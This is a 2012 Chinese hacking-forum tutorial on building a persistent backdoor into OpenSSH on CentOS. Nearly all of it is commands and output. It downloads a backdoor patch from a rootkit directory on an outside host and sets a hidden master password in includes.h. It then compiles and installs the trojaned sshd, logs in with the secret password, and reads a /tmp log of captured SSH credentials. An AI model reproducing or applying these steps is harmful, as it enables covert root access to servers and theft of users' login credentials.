切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
364 持续后门 openssh backdoor[复制链接]
发表于 2012-11-27 22:50:04 | 显示全部楼层 |!read_mode!

理论不多说了 需要看的
google :
1 rootkit
2 openssh
3 http://baike.baidu.com/view/449989.htm

打开CENTOS

注意 每次进行ROOTKIT行为 必须备份虚拟机 结束后做笔记 然后恢复虚拟机

关于思路 OPENSSH-SERVER 是每个LINUX 服务器必须的服务
原理
下载SOURCE包的OPENSSH-SERVER -》打后门补丁 -》 编译 -》启动 OPENSHH -》 持续后门访问

首先链接CENTOS 安装内核

  1. [root@Centos ~]# yum -y install kernel kernel-headers kernel-devel
复制代码

关闭CENTOS 进行备份 在启动查看SSH版本

  1. [root@Centos ~]# ssh -v
  2. OpenSSH_4.3p2, OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008
复制代码

版本是 OpenSSH_4.3p2

需找软件包
  1. [root@Centos tmp]# wget http://64studio.hivelocity.net/apt/pool/main/o/openssh/openssh_4.3p2.orig.tar.gz
  2. [root@Centos tmp]# tar xf openssh_4.3p2.orig.tar.gz
  3. [root@Centos tmp]# cd openssh-4.3p2/
复制代码

下载Patch 补丁 不一定版本要是一样
  1. [root@Centos openssh-4.3p2]# cd ..
  2. [root@Centos tmp]# wget http://lucky.fuzzexp.org/file/r00tk1t/openssh-5.5p1.patch.tar.gz
  3. [root@Centos tmp]# tar xf openssh-5.5p1.patch.tar.gz
  4. [root@Centos tmp]# cd openssh-5.5p1.patch
  5. [root@Centos openssh-5.5p1.patch]#
复制代码

吧.diff 复制到SSH源代码目录
  1. [root@Centos openssh-5.5p1.patch]# cp sshbd5.5p1.diff ../openssh-4.3p2/
复制代码

打补丁
  1. [root@Centos openssh-5.5p1.patch]# cd ../openssh-4.3p2/
  2. [root@Centos openssh-4.3p2]# patch < sshbd5.5p1.diff
  3. patching file auth.c
  4. Hunk #1 succeeded at 243 (offset -28 lines).
  5. patching file auth-passwd.c
  6. Hunk #1 succeeded at 113 (offset -9 lines).
  7. patching file canohost.c
  8. Hunk #1 succeeded at 60 (offset -18 lines).
  9. patching file includes.h
  10. Hunk #1 succeeded at 211 (offset 39 lines).
  11. patching file sshconnect2.c
  12. Hunk #1 succeeded at 736 with fuzz 2 (offset -80 lines).
  13. patching file sshlogin.c
  14. Hunk #1 succeeded at 112 (offset -21 lines).
  15. [root@Centos openssh-4.3p2]#
复制代码

注意查看一下SSH版本 有些补丁可能会更改
  1. [root@Centos openssh-4.3p2]# cat version.h  #版本
复制代码

设置你的后门密码 一般在includes.h 文件
  1. [root@Centos openssh-4.3p2]# nano includes.h
复制代码

如:
  1. [root@Centos openssh-4.3p2]# cat includes.h | grep SECRETPW
  2. #define SECRETPW "apaajaboleh"
复制代码

这个久是密码
  1. [root@Centos openssh-4.3p2]# cat includes.h | grep /tmp/
  2. #define ILOG "/tmp/ilog"
  3. #define OLOG "/tmp/olog"
  4. [root@Centos openssh-4.3p2]#
复制代码

这个久是链接SSH的帐号密码记录 编辑后进行编译
我吧密码成改HELEN 进行编译吧
  1. [root@Centos openssh-4.3p2]# ./configure --prefix=/usr --sysconfdir=/etc/ssh
复制代码

出现错误 缺少什么久装什么
  1. configure: error: *** zlib missing - please install first or check config.log ***
复制代码

[root@Centos openssh-4.3p2]# yum install zlib zlib-devel -y
[root@Centos openssh-4.3p2]# ./configure –prefix=/usr –sysconfdir=/etc/ssh继续出现错误
  1. configure: error: *** Can't find recent OpenSSL libcrypto (see config.log for details) ***
  2. [root@Centos openssh-4.3p2]# yum install openssl-devel openssl -y
  3. [root@Centos openssh-4.3p2]# ./configure --prefix=/usr --sysconfdir=/etc/ssh
复制代码

这次没错了 MAKE
  1. [root@Centos openssh-4.3p2]# make
  2. [root@Centos openssh-4.3p2]# make install
复制代码

注意 这里游几个错误
  1. /etc/ssh/sshd_config line 74: Unsupported option GSSAPIAuthentication
  2. /etc/ssh/sshd_config line 76: Unsupported option GSSAPICleanupCredentials
  3. /etc/ssh/sshd_config line 87: Unsupported option UsePAM
复制代码

重启试试
  1. [root@Centos openssh-4.3p2]# /etc/init.d/sshd restart
  2. 停止 sshd:                                                [确定]
  3. 启动 sshd:/etc/ssh/sshd_config line 74: Unsupported option GSSAPIAuthentication
  4. /etc/ssh/sshd_config line 76: Unsupported option GSSAPICleanupCredentials
  5. /etc/ssh/sshd_config line 87: Unsupported option UsePAM
  6.                                                            [确定]
  7. [root@Centos openssh-4.3p2]#
复制代码

编辑 /etc/ssh/sshd_config 吧 Unsupported option后门的东西删除了 或者注释了
  1. [root@Centos openssh-4.3p2]# nano /etc/ssh/sshd_config
复制代码

GSSAPICleanupCredentials GSSAPIAuthentication UsePAM 注释了 重启
  1. [root@Centos openssh-4.3p2]# /etc/init.d/sshd restart
  2. 停止 sshd:                                                [确定]
  3. 启动 sshd:                                                [确定]
  4. [root@Centos openssh-4.3p2]# netstat -antp
  5. Active Internet connections (servers and established)
  6. Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
  7. tcp        0      0 0.0.0.0:740                 0.0.0.0:*                   LISTEN      1830/rpc.statd      
  8. tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      1794/portmap        
  9. tcp        0      0 127.0.0.1:631               0.0.0.0:*                   LISTEN      2103/cupsd         
  10. tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      2142/sendmail: acce
  11. tcp        0      0 :::22                       :::*                        LISTEN      31118/sshd         
  12. tcp        0      0 ::ffff:5.5.5.6:22           ::ffff:5.5.5.1:35961        ESTABLISHED 2375/0              
  13. [root@Centos openssh-4.3p2]#
复制代码

链接试试 密码HELEN
  1. brk $ ssh root@5.5.5.6
  2. root@5.5.5.6's password:
  3. Last login: Thu Nov 22 09:31:22 2012 from 5.5.5.1
  4. [root@Centos ~]#
复制代码

成功 看看能记录CENTOS的SSH吗? CENTOS链接其他的机子
当链接的时候出错
  1. [root@Centos ~]# ssh root@5.5.5.1
  2. /etc/ssh/ssh_config line 44: Unsupported option "GSSAPIAuthentication"
复制代码

吧 GSSAPIAuthentication 注释了 重启
  1. [root@Centos ~]# ssh root@5.5.5.1
  2. The authenticity of host '5.5.5.1 (5.5.5.1)' can't be established.
  3. RSA key fingerprint is 08:5c:c8:db:12:e2:b5:47:c3:f0:9d:de:b8:eb:27:fa.
  4. Are you sure you want to continue connecting (yes/no)? yes
  5. Warning: Permanently added '5.5.5.1' (RSA) to the list of known hosts.
  6. root@5.5.5.1's password:

  7. The programs included with the Ubuntu system are free software;
  8. the exact distribution terms for each program are described in the
  9. individual files in /usr/share/doc/*/copyright.

  10. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
  11. applicable law.

  12. Welcome to Ubuntu 12.10 (GNU/Linux 3.5.0-18-generic x86_64)

  13. * Documentation:  https://help.ubuntu.com/

  14. root@Pc:~#
复制代码

查看记录
  1. root@Pc:~# exit
  2. 登出
  3. Connection to 5.5.5.1 closed.
  4. [root@Centos ~]# cat /tmp/olog
  5. user:password@host --> root:aa@5.5.5.1
复制代码

OK分析一些 文件没有被
  1. [root@Centos tmp]# ls
  2. ilog  olog  openssh-4.3p2  openssh_4.3p2.orig.tar.gz
复制代码

SO LINUX下的后门需要多个配合一起使用 NEXT :365弹



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-31 06:54

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部